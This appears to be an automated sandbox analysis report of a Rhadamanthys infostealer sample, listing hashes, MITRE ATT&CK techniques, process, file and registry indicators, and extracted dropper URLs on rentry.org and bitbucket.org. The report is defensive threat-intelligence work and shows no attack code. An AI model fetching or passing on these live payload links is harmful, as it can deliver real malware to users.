rhadamanthys | 7234b080bdcea32573730ff1a6f7e17985ccd2d2743b3b9a4da5d30c0cfda846

Analysis

max time kernel
1800s
max time network
1609s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-06-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

7KB
MD5

b5e479d3926b22b59926050c29c4e761
SHA1

a456cc6993d12abe6c44f2d453d7ae5da2029e24
SHA256

fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
SHA512

09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
SSDEEP

192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 4348 created 2548 4348 WerFault.exe cmd.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

rtjirqmr.y331.exesvchost.exe

description pid process target process

PID 4432 created 3128 4432 rtjirqmr.y331.exe sihost.exe
PID 1568 created 2548 1568 svchost.exe cmd.exe
PID 1568 created 4864 1568 svchost.exe timeout.exe
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exemsiexec.exepowershell.exe

flow pid process

2 972 powershell.exe
5 972 powershell.exe
8 2672 powershell.exe
10 1464 powershell.exe
22 4404 msiexec.exe
24 4404 msiexec.exe
31 2672 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2672 powershell.exe
2672 powershell.exe
1124 powershell.exe
972 powershell.exe
1464 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 4 IoCs

Processes:

rtjirqmr.y330.exertjirqmr.y331.exertjirqmr.y332.exertjirqmr.y333.exe

pid process

1692 rtjirqmr.y330.exe
4432 rtjirqmr.y331.exe
4936 rtjirqmr.y332.exe
2580 rtjirqmr.y333.exe
Loads dropped DLL 6 IoCs

Processes:

MsiExec.exeMsiExec.exeMsiExec.exe

pid process

2544 MsiExec.exe
2544 MsiExec.exe
2544 MsiExec.exe
2544 MsiExec.exe
4500 MsiExec.exe
492 MsiExec.exe

description	pid	process	target process
PID 4348 created 2548	4348	WerFault.exe	cmd.exe

description	pid	process	target process
PID 4432 created 3128	4432	rtjirqmr.y331.exe	sihost.exe
PID 1568 created 2548	1568	svchost.exe	cmd.exe
PID 1568 created 4864	1568	svchost.exe	timeout.exe

flow	pid	process
2	972	powershell.exe
5	972	powershell.exe
8	2672	powershell.exe
10	1464	powershell.exe
22	4404	msiexec.exe
24	4404	msiexec.exe
31	2672	powershell.exe

pid	process
2672	powershell.exe
2672	powershell.exe
1124	powershell.exe
972	powershell.exe
1464	powershell.exe

pid	process
1692	rtjirqmr.y330.exe
4432	rtjirqmr.y331.exe
4936	rtjirqmr.y332.exe
2580	rtjirqmr.y333.exe

pid	process
2544	MsiExec.exe
2544	MsiExec.exe
2544	MsiExec.exe
2544	MsiExec.exe
4500	MsiExec.exe
492	MsiExec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 bitbucket.org
5 bitbucket.org
10 bitbucket.org

flow	ioc
4	bitbucket.org
5	bitbucket.org
10	bitbucket.org

Drops file in System32 directory 17 IoCs

Processes:

svchost.exeOfficeClickToRun.exesvchost.exertjirqmr.y332.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	rtjirqmr.y332.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\RunNodeScriptAtLogon	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

rtjirqmr.y332.exe

description pid process target process

PID 4936 set thread context of 4412 4936 rtjirqmr.y332.exe dialer.exe

description	pid	process	target process
PID 4936 set thread context of 4412	4936	rtjirqmr.y332.exe	dialer.exe

Drops file in Program Files directory 64 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\jsonparse\samplejson\basic2.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-user-validate\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\parser.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\package-spec.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-edit.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\config.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\diff.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\source\vendor\supports-color\browser.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\json.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\retry\example\dns.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-doctor.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\pack.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\node_modules\strip-ansi\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\packaging\_musllinux.py	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.cmd	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\walk-up-path\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\src\utils.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cross-spawn\lib\util\escape.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\is-lambda\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\LICENSE	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\retry\example\stop.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\lib\errors.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\bin\cssesc	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\which\node_modules\isexe\dist\cjs\options.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\workspaces.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\map-workspaces\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-whoami.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\file-exists.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\is-server-package.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\major.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\combining.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\util\getProp.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\get-node-modules.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\binary-extensions\license	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\esm\bin.mjs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\sigstore.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\sign\dist\bundler\base.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\check-bins.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\types.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.ps1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\run-script\lib\run-script.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\bin\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\pattern.d.ts	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\processor.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\console-control-strings\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man1\npm-install.1	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@isaacs\cliui\build\index.cjs	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\text.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\npm-normalize-package-bin\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\corepack.cmd	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\lib\index.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\balanced-match\LICENSE.md	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\developers.html	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\man\man7\orgs.7	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\className.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\gtr.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\glob\dist\commonjs\index.js	msiexec.exe

Drops file in Windows directory 18 IoCs

Processes:

msiexec.exeExplorer.EXE

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI23FB.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{637236E9-EF59-4F9D-8269-3083C1A6C6D6}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31C7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C86.tmp	msiexec.exe
File created	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI233E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\NodeIcon	msiexec.exe
File created	C:\Windows\Installer\e591e60.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\rescache\_merged\3060194815\1209253612.pri	Explorer.EXE
File created	C:\Windows\Installer\e591e5c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e591e5c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI23AC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9094.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI973D.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	Explorer.EXE

Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3484 sc.exe
840 sc.exe
5040 sc.exe
4216 sc.exe
1040 sc.exe
4580 sc.exe
4264 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

376 schtasks.exe
2880 schtasks.exe

pid	process
3484	sc.exe
840	sc.exe
5040	sc.exe
4216	sc.exe
1040	sc.exe
4580	sc.exe
4264	sc.exe

pid	process
376	schtasks.exe
2880	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
5008
2132
3228
2872
1520
4540	timeout.exe
920	timeout.exe
240
3400
4884
992
660
4040
2552
4236
2080
2116
632
4908
2704
1840	timeout.exe
2788
4776
2704
4872	timeout.exe
4948
1612
1132	timeout.exe
3560
5032
4920
2992
2912
4336
5024
3976	timeout.exe
2620	timeout.exe
3552
4672
2668
2968
240
4544
1440
4464
2668
3440
1956
3400
1120
4204	timeout.exe
5036	timeout.exe
3812
3220
1208
3404
2520
3324
4636
2512
2096
1044
1920
208

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3784 tasklist.exe
2692 tasklist.exe
4360 tasklist.exe
3256 tasklist.exe
4972 tasklist.exe
516 tasklist.exe
5028 tasklist.exe
1028 tasklist.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4672 taskkill.exe
2824 taskkill.exe
3688 taskkill.exe
5028 taskkill.exe
2756 taskkill.exe
4620 taskkill.exe
2292 taskkill.exe
4932 taskkill.exe

pid	process
3784	tasklist.exe
2692	tasklist.exe
4360	tasklist.exe
3256	tasklist.exe
4972	tasklist.exe
516	tasklist.exe
5028	tasklist.exe
1028	tasklist.exe

pid	process
4672	taskkill.exe
2824	taskkill.exe
3688	taskkill.exe
5028	taskkill.exe
2756	taskkill.exe
4620	taskkill.exe
2292	taskkill.exe
4932	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Internet Explorer\TypedURLs	Explorer.EXE

Modifies data under HKEY_USERS 21 IoCs

Processes:

OfficeClickToRun.exemsiexec.exesvchost.exeMsiExec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718475374"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 18:16:15 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	MsiExec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E2BBCF38-C89A-4D17-8DDC-38EDD8C8C05C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXEmsiexec.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "8"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000ed30bdda43008947a7f8d013a47366226400000078000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 5a003100000000008458a363100043726173687061640000420009000400efbe8458a3638458a3632e0000009ca7010000000100000000000000000000000000000025be0a0143007200610073006800700061006400000018000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery"	Explorer.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
